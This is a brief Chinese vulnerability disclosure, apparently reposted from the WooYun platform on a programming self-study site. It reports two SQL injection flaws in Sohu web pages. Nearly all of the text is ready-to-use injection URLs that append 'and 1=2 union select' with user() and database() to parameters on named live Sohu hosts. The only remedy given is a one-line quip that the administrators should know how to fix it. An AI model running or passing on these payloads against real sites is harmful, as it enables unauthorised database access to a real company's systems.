http://card.money.sohu.com/yh/card_product.php?id=70 漏洞 证明:http://card.money.sohu.com/yh/card_product.php?id=70%20and%201=2%20union%20select%201,user(),3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 详细说明:http://app.sh.sohu.com/loreal/s.php?id=111 漏洞证明:http://app.sh.sohu.com/loreal/s.php?id=111%20and%201=2%20union%20select%201,user(),database(),4,5,6,7,8 修复方案:你们管理员应该会哦 作者.AK.@乌云
查看更多关于搜狐的两个SQL注射及修复 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12366